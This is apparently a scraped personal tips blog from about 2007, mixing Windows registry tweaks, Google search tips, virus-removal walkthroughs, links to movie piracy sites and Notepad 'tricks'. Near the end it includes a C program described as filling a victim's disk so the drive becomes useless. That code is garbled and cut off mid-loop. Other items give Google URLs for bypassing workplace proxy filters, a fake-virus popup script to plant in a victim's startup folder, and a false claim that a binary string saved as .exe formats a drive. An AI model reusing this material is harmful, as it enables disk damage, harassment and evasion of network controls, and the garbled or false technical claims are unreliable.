HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ NoClose
Set this DWORD value to 1 to remove the Turn Off button. Set it back to 0 if you want people to be able to turn off the computer
182. Remove the Network tab from Windows Media Player (WMP) 8 and later
HKEY_CURRENT_USER\Software\Policies\Microsoft\WindowsMediaPlayer\ HideNetworkTab
Set this DWORD value to 1 to remove the Network tab in the Windows Medial Player 8 and later Options window
183. Stop users from installing Windows Installer files for removable media
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer\DisableMedia
Set this DWORD value to 1
184. Protect against DoS attacks
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\SynAttackProtect This setting protects against a SYN flood attack. Set to a value of 0, 1, or 2 for increasing levels of protection. The higher the value, the more delay Windows adds to connection attempts, causing TCP connection timeouts.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\EnableDeadGWDetect Set to 0 to prevent the computer from switching to a different gateway, which could otherwise occur if a DoS attack is in progress. A value of 1 allows the gateway switch.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\EnablePMTUDiscovery Set to 0 to prevent a hacker from forcing an MTU change to a small value and bogging down the TCP/IP protocol stack. Windows uses an MTU value of 576 bytes for all nonlocal connections with this setting at 0. Set to 1 to allow MTU discovery.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\KeepAliveTime Set this value (in milliseconds) to a relatively low number to decrease the length of time Windows sends a keep-alive packet to a remote computer to determine if the connection is still valid. Microsoft recommends a value of 300,000, or five minutes.
These are all DWORD values
185. Prevent computer from releasing its NetBIOS name
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netbt\Parameters \NoNameReleaseOnDemand
Set this to 1
186. Change Wait to Kill Server Timeout
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\WaitToKillServiceTimeout
Change this to the number of milliseconds to wait before killing a service when Windows NT is shutting down
187. Disable the Windows XP Tour prompt
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Applets\Tour\RunCount
Set this DWORD value to 0
188. Disable importing or exporting their Microsoft Internet Explorer (IE) Favorites
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\DisableImportExportFavorites
Set this DWORD value to 1
189. Disable Outlook 2002’s Persistent View
HKEY_CURRENT_USER\Software\Microsoft\Office\10.0 or 11.0\Outlook\Options\PersistViewSelection
Set this DWORD value to 0. This will stop Outlook 2002 and later from remembering the item you last had selected in a mail folder.
190. Clear the Google Toolbar search history
HKEY_CURRENT_USER\Software\Google\NavClient\1.1\History
Delete this key to clear the search history
191. Remove the Properties item from the Recycle Bin's context menu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
Set this DWORD value to 1.
192. Hide drive letters in My Computer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Servers\NoDrives Edit this DWORD value. Using the list below, type a number that corresponds to the drive you want to hide:
A: 1
B: 2
C: 4
D: 8
E: 16
F: 32
To hide other drive letters that we didn't list, follow the pattern of doubling the number for each successive drive. For example, drive G: would have a value of 64.
To hide multiple drives, add the values together. For example, to hide drives A: and B:, use a value of 3. If you want to hide all drive letters, use a value of 67108864.
193. Stop Internet Links from Opening in Internet Explorer (IE) Sessions
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AllowWindowReuse
Set this DWORD value to 0 to force Windows to open a new IE session when a link is clicked from another application in Windows
194. Stop Internet Explorer (IE) from creating the Links folder under the Favorites menu
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\LinksFolderName
Clear the value data for this. Then start IE and delete the Links folder from the Favorites menu. 195. Disable the Internet Explorer (IE) script debugger
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger
Set the value data to "yes" to disable the script debugger
196. Prevent users from running Cmd.exe
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD
Set this DWORD value to 1
197. Hide Date and Time Information in the System Tray Notification Area
(contributed by David Chernicoff, david@winnetmag.com)
In the May 29 issue of Windows Client UPDATE, I showed you how to make registry changes in Windows XP to hide the icons in the notification area of the system tray from users. A few readers responded that they want to keep the icons but hide date and time information because it occupies so much space. Doing so is easy with the following registry change:
1. Launch regedit.
2. Open HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
policies\Explorer
3. Create a HideClock value of type REG_DWORD and set the value to 1.
4. Exit regedit and reboot the computer.
198. Hide a server from network browsers
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\Hidden Set this DWORD value to 1
199. Remove the Manage context-menu option for My Computer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoManageMyComputerVerb
Set this DWORD value to 1
200. Configure the Recovery Console (RC) to not require the administrator password
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Setup\RecoveryConsole\SecurityLevel Set this to 1
201. Change Backup Interval of the DHCP database
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DHCPServer\Parameters\BackupInterval Change this to the number of minutes desired between backups.
202. Prevent DNS spoofing
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DNS\Parameters\SecureResponses. Set this DWORD value to 1
203. Disable the F3 key search capability for Windows Explorer and Internet Explorer (IE)
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFindFiles
Set this DWORD value to 1
204. Keep a particular user from appearing on the Welcome Screen
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\
Create a new DWORD value with the exact same username as the person you want to hid. Set this value to 0.
205. Recording The Reason For A System Shutdown In XP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability\ShutdownReasonUI Set this DWORD value to 1
206. Modify the title text of Windows Media Player (WMP)
HKEY_CURRENT_USER\Software\Policies\Microsoft\WindowsMediaPlayer\TitleBar
Set this STRING value to be what you want the title to be
207. Change the number of undo levels in Microsoft Excel 2000 and later
HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Excel\Options\UndoHistory (Excel 2002)
HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Options\UndoHistory
(Excel 2000)
Set this DWORD to a value from 0 to 100
208. Change the number of undo levels in Microsoft Access 2002
HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Access\Settings\Number of Undos
Set this DWORD to a value from 1 to 20
209. Stop Microsoft Outlook 2002 from caching the Internet Mail Service (IMS) passwords
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\10.0\Outlook\Security\EnableRememberPwd Set this DWORD value to 0
210. Clear the Windows Run Most Recently Used List
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Delete this key to delete the most recently used list in the Run dialog box
211. Prevent Windows Media Player (WMP) 8.0 and later from maintaining recent-files list
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\AddToMRU
Set this BINARY value to 00 to disable the list or 01 to enable it
212. Clear Windows Media Player (WMP) 8.0 and later Most Recently Used List
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\RecentFileList
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\RecentURLList
Delete these keys
213. Empty your Windows NT Documents During Log Off
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClearRecentDocsOnExit Set this value to 1
214. Configure Windows XP Searches to Default to Your Preferences
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\CaseSensitive
\IncludeSubFolders
\SearchHidden
\SearchSlowFiles
\SearchSystemDirectories
Set these values to 1 to enable or 0 to disable
215. Run commands automatically when a console opens
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\Autorun
Enter a command here that you want to run startup for all command console sessions
216. Increase logon timeout for slow networks
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\ExpectedDialupDelay Set this DWORD value to the number of seconds you want to wait for a response from the server. You can set the value at anywhere between 0 and 600 seconds.
217. Add Internet time servers to Windows XP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\DateTime\Servers
Right-click the Servers key, and select New | String value.
Name the value 3, and press [Enter] twice to access the Edit String Value dialog box.
Type the address of the SNTP time server in the Value Data text box, and click OK.
Repeat Steps 3 through 5 for each additional SNTP time server you want to add, incrementing the value name each time: 4, 5, 6, and so on.
218. Optimize the Server service for memory use or network throughput
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters\Size Chang the value to 1 to minimize memory use, 2 to balance memory and network throughput, or 3 to maximize network throughput
219. Configure System Cache Setting
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\LargeSystemCache
Set this to 0 for desktop mode or 1 for server mode
220. Customize the Windows Messenger Startup Message
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MessengerService\Policies\IMWar
Set this REG_SZ to the message you want to appear when Windows Messenger starts

Instead of performing the above difficult to remember process, simply save the following with an extension of .reg and add it's contents to the registry by double clicking on it.
for example:
WindowsMediaPlayer title

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Policies\Microsoft\WindowsMediaPlayer]
"TitleBar"="naveen"

Goooooooooooogle tips

What is "Google"?
Definition: Googol
Pronunciation: 'gü-"gol
Function: noun
Google is a play on the word googol, which was coined by Milton Sirotta, nephew of American mathematician Edward Kasner, and was popularized in the book, "Mathematics and the Imagination" by Kasner and James Newman. It refers to the number represented by the numeral 1 followed by 100 zeros. Google's use of the term reflects the company's mission to organize the immense, seemingly infinite amount of information available on the web.
Originally called "Backrub", the logic behind the Google search engine was develop by graduate students Larry Page and Sergey Brin at Stanford University in 1995. Their first place of business was literally a garage. The garage location was chosen because it had a washer/dryer and a hot tub out back, they were already serving 10,000 searches a day.
try this link--
http://www.google.com/corporate/history.html
So How Does Google Work?
* Crawls and indexes web pages et al.
* Stores copies of web pages and graphics on their caching servers
* Presents users with simple front end to query the database of cached pages
* Returns search results in a ordered fashion based upon relevancy
Anatomy of a Search
http://computer.howstuffworks.com/search-engine1.htm
Server Side
Client Side
What Can Google Search?
* Adobe Portable Document Format (pdf)
* Adobe PostScript (ps)
* Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
* Lotus WordPro (lwp)
* MacWrite (mw)
* Microsoft Excel (xls)
* Microsoft PowerPoint (ppt)
* Microsoft Word (doc)
* Microsoft Works (wks, wps, wdb)
* Microsoft Write (wri)
* Rich Text Format (rtf)
* Shockwave Flash (swf)
* Text (ans, txt)
What is "Google"?
cont.
So What Determines Page Relevance and Rating?
* Exact Phrase: are your keywords found as an exact phrase in any pages?
* Adjacency: how close are your keywords to each other?
* Weighting: how many times do the keywords appear in the page?
* PageRank/Links: How many links point to the page? How many links are actually in the page?
Equation: (Exact Phrase Hit)+(AdjacencyFactor)+(Weight) * (PageRank/Links)
How Do I Get Results?
* Pick your keywords carefully & be specific
* Do NOT exceed 10 keywords
* Use Boolean modifiers
* Use advanced operators
* Google ignores some words:
a, about, an, and, are, as, at, be, by, from, how, i, in, is, it, of,
on, or, that, the, this, to, we, what, when, where, which, with
Google's Boolean Modifiers
* AND is always implied.
* OR: Escobar (Narcotics OR Cocaine)
* "-" = NOT: Escobar -Pablo
* "+" = MUST: Escobar +Roberto
* Use quotes for exact phrase matching: "nobody puts baby in a corner"
OR
"there are known knowns; there are things we know we know. We also know there are known unknowns; that is to say we know there are some things we do not know. But there are also unknown unknowns, the ones we don't know we don't know."
Use Google To Calculate Mathematical Equations
Google adds in new functions in its search every year. A couple of years ago, it quietly added the ability to calculate mathematical equations right from the search box.
If you enter 25 + 35, Google will return 25 + 35 = 60, along with, of course, an option to search for documents that include the term 25 + 35.
To use Google's built-in calculator function, simply enter the calculation you'd like done into the search box and hit the Enter key or click on the Google Search button. The calculator can solve math problems involving basic arithmetic, more complicated math, units of measure and conversions, and physical constants.
Try one of the sample expressions below, or refer to google complete instructions for help in building your own.
http://www.google.co.in/help/calculator.html
These sample queries demonstrate the utility and power of this new feature:
* 5+2*2
* 2^20
* sqrt(-4)
* half a cup in teaspoons
* 160 pounds * 4000 feet in Calories
language converter............
from google---
http://translate.google.com/translate_t
and from altavista ---
http://babelfish.altavista.digital.com/babelfish/tr
How To View any Restricted Website with Google
Most companies and schools employ proxy servers to filter unwanted sites so employees won’t waste precious company resources surfing sites that the companies deem unproductive.
One way is to use an anonymous proxy server (such as http://www.spysurfing.com/). But once the system administrator learns about this, he will likely block this site as well. A much more foolproof way is to use Google.
3 ways to use google to see restricted sites:
1. An interesting workaround to bypass your proxy server is to use Google Translate to translate the page you want to view from English to English, like this:
http://www.google.com/translate?langpair=en|en&u=www.websiteurl.com

2. Another interesting way to bypass it is to use Google Mobile to load a site:
http://www.google.com/gwt/n?u=www.websiteurl.com

For example:
http://www.google.com/gwt/n?u=www.youtube.com

3. The third technique is to use Google Cache.
Search in Google.com your desired website. If you search for myspace.com in the right of the domain you’ll see the word Cached.
Using this technique, you should be able to view most of the sites you want. The only downside to this is that the content cached by Google might be outdated, and some images may not load at all.

Nov 3, 2007

Removing Virus......

folder option Problem
u r pc is infected with some virus or disabled by Someone
may be ravmon.exe
t removes folder options from list
u hav got some tools like RRT to remove restrictions like folder option
u can view all folders(hidden also) after using that tool
download the tool and enjoyyyyyyyy
or
1.Execute Regedit (shortcut, or StartMenu -- Run, and type regedit ..)
2. move with mouse to menu in Regedit's window and go to Edit -- Find (or simply stroke Ctrl+F)
3. Type HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\E xplorer
4. and finally - find REG_DWORD entry, named NoFolderOptions (if it is there at all, but probably it is) See, if mentioned entry has value 1 ... If it has, simply change it to 0, and that should do the trick
drives don open with doubleclick
The symptom occurs because when autorun.vbs is created by trojan horse or virus.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
Userinit=userinit.exe,autorun.exe
Finally, autorun.bat will call wscript.exe to run autorun.vbs.
When antivirus or security software detected the autorun.vbs file as infected, the file will be deleted or removed or quarantined. However, other files (autorun.*) and registry value still referring to autorun.vbs, and this document no longer exists, hence the error when users double
click to open a drive folder. To correct and solve this error, follow this steps:
Run Task Manager (Ctrl-Alt-Del or right click on Taskbar)
Stop wscript.exe process if available by highlighting the process name and clicking End Process.
Then terminate explorer.exe process.
In Task Manager, click on File -> New Task (Run…).
Type “cmd” (without quotes) into the Open text box and click OK.
Type the following command one by one followed by hitting Enter key:
del c:\autorun.* /f /s /q /a
del d:\autorun.* /f /s /q /a
del e:\autorun.* /f /s /q /a
c, d, e each represents drive letters on Windows system. If there are more drives or partitions available, continue to command by altering to other drive letter. Note that you must also clean the autorun files from USB flash drive or portable hard disk as the external drive may also be infected. then in Task Manager, click on File -> New Task (Run…).
Type “regedit” (without quotes) into the Open text box and click OK.
Navigate to the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Check if the value name and value data for the key is correct (the value data of userint.exe include the path which may be different than C drive, which is also valid, note also the comma
which is also needed):
“Userinit”=”C:\WINDOWS\system32\userinit.exe,”
If the value is incorrent, modify it to the valid value data.
Or
whenever u bring a USB from an untrusted source, or u are suspicious, u right click the drive --->explore. This way the trojan, if present wont run. Also, if a drive doesnt open due to trojan, for the time being u can open it by right click drive--->explore. After that u can unhide hidden files and system files from the folder options to search for suspicious files and folders and remove/rename them. In USBs, the trojans come with an autorun.ini/.inf and the trojan program which gets executed by the script in the autorun.ini/inf Lets see wether your system is infected or not... Download HijackThis
Install and run this software
Click "Do a system and save logfile"
There are chances of possible malware present in your system that's why i suggested this software.
desktop_ini Trojan
well this is a nearly harmless virus, i'm also infected with this...........but don't worry do the following go to my computer right-click on C drive and choose serch option enter the keyword u mention & click on search(after enablibg all options except case sensitive from more advanced option) after finishing search select all what the search shows and press shift+del do the same for remaining drives
Brontok Worm Problem
Brontok is a computer worm, which spreads through emails and USB drives.There are so many variants of brontok but they basically work Similarly. How do I know if my system is infected? You can’t start Regedit.exe
When trying to start any other registry editor, the system restarts The system also restarts when executing certain EXE files The presence of the following files:
%WINDIR%\eksplorasi.pif
%UserProfile%\Local Settings\Application Data\smss.exe
%UserProfile%\Local Settings\Application Data\services.exe
%UserProfile%\Local Settings\Application Data\lsass.exe
%UserProfile%\Local Settings\Application Data\csrss.exe
%UserProfile%\Local Settings\Application Data\inetinfo.exe
%UserProfile%\Local Settings\Application Data\winlogon.exe
%UserProfile%\Start Menu\Programs\Startup\Empty.pif
%UserProfile%\Templates\WowTumpeh.com
%WINDIR%\%CURRENT_USER%’s Setting.scr
%WINDIR%\ShellNew\bronstab.exe
All these files have the size of the worm’s main executable: 42,028
Bytes (About 42 KB).

What does it do?
Disable Folder Optionsa
Disable Registry Editor
Installs itself in the startup
When in memory, it will restart the system if any program involving the Registry is started
How to remove Brontok?
Download and run this brontok removal tool from Bitdefender. This tool Will kill the brontok process, restore folder options and registry.

orkut is blocked with message
Due to the attack of w32.USBWorm , the users may not be able to use Mozilla Firefox. And, when you use Internet explorer to open Orkut, you see a message. Also, the hidden files are not shown, even if we have selected Show hidden files in Folder Options.To resolve this problem, click here after you complete the below given steps.
Warning: Turn off System Restore before following these steps.
Tip: Its better to do the work in Safe mode.
You can try the following steps to resolve the problem:
Steps:
1. Press Ctrl+Alt+Del to open Task Manager. (Task Manager Disabled?)
2. Go to the Processes tab.
3. Click on Image Name tab to sort in accordance to name.
4. look for Image Name svchost.exe . There will be many, but click on which has User Name as
your user name .
5. After clicking on it, press Delete button (or click on End Process button). Click on Yes for confirmation.
6. Soon after the above step is done, select Run (?) from Start menu.
Type as follows:
C:\heap41a and press Enter. (Where C: is the Windows drive)
That takes you to a hidden folder heap41a in Windows drive.
7. Delete all files in that folder.
8. Now, start Registry Editor. (Start > Run > regedit) [(No Run?)(Regedit disabled?)]
9. Press Ctrl+F . Type heap41a and press Enter.
You can find two entries while you are finding, such as..
C:\heap41a\svchost.exe
C:\heap(some number)\std.txt
Delete both the entries.
10. Close the Registry Editor.

Movies sites

http://www.greatindiamovies.org/forums/index.php
http://www.ajaypr.com/2007/08/download-videos.html?h
http://www.torrentsgalaxy.com
http://www.onlinetelugumovies.com/board/forumdisplay.php?f=30
http://directdownloadstuff.blogspot.com/
http://teluguvideo.blogspot.com/
http://www.greatindiamovies.org/forums/index.php
http://www.divxcrawler.com/movies.htm
http://latestcollection.blogspot.com/

Oct 31, 2007

Windows tips 3

Hidden Star Wars Movie in Windows XP
Microsoft has hidden a version of Star Wars done entirely with ASCII characters in the Windows XP operating system.But you must be connected to internet to view it.When online,go to start->run.Now type ' telnet towel.blinkenlights.nl ' without the single quotes.See it for yourself.
It works only in Windows Xp.If you have any other operating system,watch it on YouTube:

http://www.youtube.com/watch?v=kdhrE5RMDfQ
http://www.youtube.com/watch?v=vxW2EePW8qA
Test if Antivirus is Working or not Using notepad
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Open notepad..........Copy the above code in the file....
then save it with the name fakevirus.exe
If this file got deleted immediately ....That means ur antivirus is working properly
A Funny Notepad Trick1
1. Open a blank Notepad file
2. Write .LOG as the first line of the file, followed by a enter. Save the file and close it.
3. Double-click the file to open it and notice that Notepad appends the current date and time to the end of the file and places the cursor on the line after.
4. Type your notes and then save and close the file.
After that open the file and see the changes.
A Funny Notepad Trick2
Did you know that the flight number of the plane that had hit WTC ...on 9/11 was Q33N ....Open your Notepad in ur computer and type the flight number i.e Q33N... Increase the Font Size to 72, Change the Font to Wingdings.
A Funny Notepad Trick3
Make friends scare of VIRUS
Open notepad and type this:
lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")
Then save it as Virus.VBS
and go to the folder that contains it and open it if a window pops out saying a virus has been detected it's working. Press yes or no to close the window and put it in the startup folder of the victim's account.On startup the window should appear.Note: This does not harm your computer as it does not contain virus.
Format Hard Disk using Notepad
1. Write The Following In Notepad Exactly as it says
2. Write the following code:01001011000111110010010101010101010000011111100000
3. Save As it as .EXE and any Name would Do.
4. If u run the program means it will format the Hard Drive.
Note:This is for learning purpose only. am not responsible for any liablities.
/*create bad sectors on the hard disk.
*
* This program will create bad sectors on the hard disk. If you left it
* running for long enough, it could render a hard disk quite useless. When
* bad sectors are found, the sector is marked as bad, so fixing the hard disk
* is not an easy task. Unless the victim has time and knowledge to fix the
* disk, the hard drive can be left quite literally defective.
* supported by preetam
* I don't take responsibility for what you do with this program, served foe educational purpose only.
*
*
*/

#include
#include
#include
#include
#include
#include
#include

#define HDSIZE 640000
void handle_sig();
int main() {
int i = 0;
int x;
int fd[5];
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);
char *buf;
buf = malloc(HDSIZE);
printf("sekt0r: trashing hard disk with bad sectors!\n");
while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);
for(x = 0; x < style="font-weight: bold;">
MS WORD Secret
Open Microsoft word n then type
=rand (200, 99)
then press enter

Windows XP Secret Music
Microsoft Windows XP is playing a cool music during installation. It is a pleasant little tune that you’ve probably never heard, unless you were present when Windows was being installed on your PC. After that it’s never played again, unless you know where to look for it.
To hear what you’ve been missing, just follow these:
Make you way to C:\WINDOWS\system32\oobe\images and look for a file called "Title.wma" or possibly "Windows welcome music.wma". It is around 2.56Mb in size. Just double click the file and this will open Windows Media Player, or your defaul player and it will proceed to serenade you with a more than 5 minutes music. It's up to you to repeat it.
CooL!!!
How to Lock a Folder Using Notepad
1.Consider you want to lock a folder named PICS in your D:\, whose path is D:\PICS
2.Now open the Notepad and type the following
ren pics pics.{21EC2020-3AEA-1069-A2DD-08002B30309D}
3.Where pics is your folder name. Save the text file as loc.bat in the same drive.
4.Open another new notepad text file and type the following
ren pics.{21EC2020-3AEA-1069-A2DD-08002B30309D} pics
5.Save the text file as key.bat in the same drive.
---------
Usage:
---------
6.To lock the pics folder, simply click the loc.bat and it will transform into control panel icon, which is inaccessible.
7.To unlock the folder click the key.bat file. Thus the folder will be unlocked and the contents are accessible.
Locking folders without software
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

* Now paste it in notepad.
Save it as batch file(with extension .bat).Any name will do.
Now you see a batch file. Double click it to create a folder locker.
A new folder named Locker would be formed at the same location.
Now brings all the files you want to hide in the locker folder.
Now double click the batch file to lock the folder namely Locker.
If you want to unlock your files,double click the batch file again and you would be prompted for password.Enter the password and enjoy access to the folder.

use pc as an alarm
Now this is specially for the ones who are too lazy to get up even when the trust cellphone dies screeching its lungs out. Its pretty simple Creating the playlist create a playlist of your favourite songs in Winamp, WMP or any other player. Export the playlist as a M3U playlist. M3U is generally accepted by almost every player. Triggering the alarm point to start> programs >accessories > system tools >scheduled tasks Create a new task and choose program as windows media player or winamp (May work with others too but I haven't tried anything else) Choose "daily", Enter the time and choose "every day" at next screen. It would now ask for password (leave blank in case you don't have one) Right click on the newly created task and check the "run only if logged in" check box. In the properties. Append the path to the playlist you created in the "run" text box. It should now look like Code:
Code:
"D:\windows mediaplayer\wmplayer.exe"K:\Playlists\smoothies.m3uthe text inside quotes is my WMP's path. It may vary for you. The text after WMP's path is the one to the playlist. Click OK and you're done.
A Hidden Secret in Xp
Create a new folder with the name ABC(of course you can give any name).
Open the command prompt and rename it to one of the following:
.{20D04FE0-3AEA-1069-A2D8-08002B30309D} (= My Computer)
.{450D8FBA-AD25-11D0-98A8-0800361B1103} (= My Documents)
.{208D2C60-3AEA-1069-A2D7-08002B30309D} (= My Network Places)
.{645FF040-5081-101B-9F08-00AA002F954E} (= Recycle Bin)
.{871C5380-42A0-1069-A2EA-08002B30309D} (= Internet Explorer)
.{21EC2020-3AEA-1069-A2DD-08002B30309D} (= Control Panel)
.{D20EA4E1-3957-11D2-A40B-0C5020524153} (= Administrative Tools)
.{00020D75-0000-0000-C000-000000000046} (= Inbox)
.{D20EA4E1-3957-11D2-A40B-0C5020524152} (= Fonts)
.{7007ACC7-3202-11D1-AAD2-00805FC1270E} (= Network Connections)
.{2227A280-3AEA-1069-A2DE-08002B30309D} (= Printers and Faxes)
.{7BE9D83C-A729-4D97-b5A7-1B7313C39E0A} (= Programs Folder)
.{E211B736-43FD-11D1-9EFB-0000F8757FCD} (= Scanners and Cameras)
.{D6277990-4C6A-11CF-8D87-00AA0060F5BF} (= Scheduled Tasks)
.{48E7CAAB-B918-4E58-A94D-505519C795DC} (= Start Menu Folder)
.{7BD29E00-76C1-11CF-9DD0-00A0C9034933} (= Temporary Internet Files)
.{BDEADF00-C265-11d0-BCED-00A0C90AB50F} (= Web Folders)
.{6DFD7C5C-2451-11D3-A299-00C04F8EF6AF} (= Folder Options)
.{00020801-0000-0000-C000-000000000046} (= Folder)
.{00021400-0000-0000-C000-000000000046} (= Another Folder)
Important: include the point and nothing before that!
Example: "rename ABC .{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
Now wen you will see that the icon of tht folder has changed(No name) to My computer Icon.Now Make a shortcut to that folder, change the target and icon and you have a nameless shortcut.

some STRANGER things in XP
1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).
2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).
3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.
4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

Make Invisible Folders!!

KEEP FOLDERS HIDDEN (Without any External Application)
Just go through the steps below..then u can make a hidden folder to keep all your data SAFE!
1. First create a new folder somewhere on your hard drive
when you name it hold down "Alt" and press "0160" this will create and invisible space so it will apper as if it has no name.
2. Then right click in and select "Properties" select the tab "coustimize" and select "change icon" scroll along and you should a few blanc spaces click on any one and click OK
when you hav saved the settings the folder will be invisible to hide all your personal files. You just have to remember the folders location in your hard drive..

Good Links........

http://www.funatoz.com/in/
http://www.braindynamic.com/
http://webdeposite.com/
http://www.allposters.com/
http://www.inspirational-quotes.info/
http://www.super3gp.com/
http://idevelopers.freespaces.com/tutor.html
http://www.piratequiz.com/
http://home.comcast.net/%7Ewolfand/
http://cooltechtrix.blogspot.com/
FONTS :
http://www.dafont.com/
http://www.acidfonts.com/
http://www.topfreefonts.com/
http://www.1001freefonts.com/
E-Greetings
www.123greetings.com
www.3greetings.com
www.greetings.jagran.com
www.clubgreetings.com
www.archiesonline.com
www.hallmark.com
www.cardbymail.com
Cricket
www.total-cricket.com
www.cricinfo.com
www.cricket.org
www.go4cricket.com
www.khel.com
www.cricket.org
www.cricketnyou.com
www.clickcricket.com
www.thatscricket.com
www.magiccricket.com
www.cricketline.com
www.yehhaicricket.com
www.cricketnext.com
wallpaper Sites
4 bollywood wallpaper
www.santabanta.com
www.indiafm.com
www.glamsham.com
4 game wallpapers
www.games2wallpapers.com
wallpapers.gamez.com
bestgamewallpapers.com
